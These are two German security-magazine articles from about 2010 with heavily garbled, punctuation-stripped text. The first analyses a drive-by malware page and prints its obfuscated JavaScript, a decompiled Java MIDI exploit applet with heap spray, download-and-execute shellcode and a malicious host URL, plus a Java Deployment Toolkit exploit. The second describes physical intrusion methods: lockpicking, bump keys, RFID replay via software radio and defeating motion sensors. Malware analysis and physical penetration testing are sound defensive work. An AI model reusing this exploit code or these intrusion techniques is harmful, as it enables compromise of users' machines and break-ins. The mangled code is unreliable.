ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
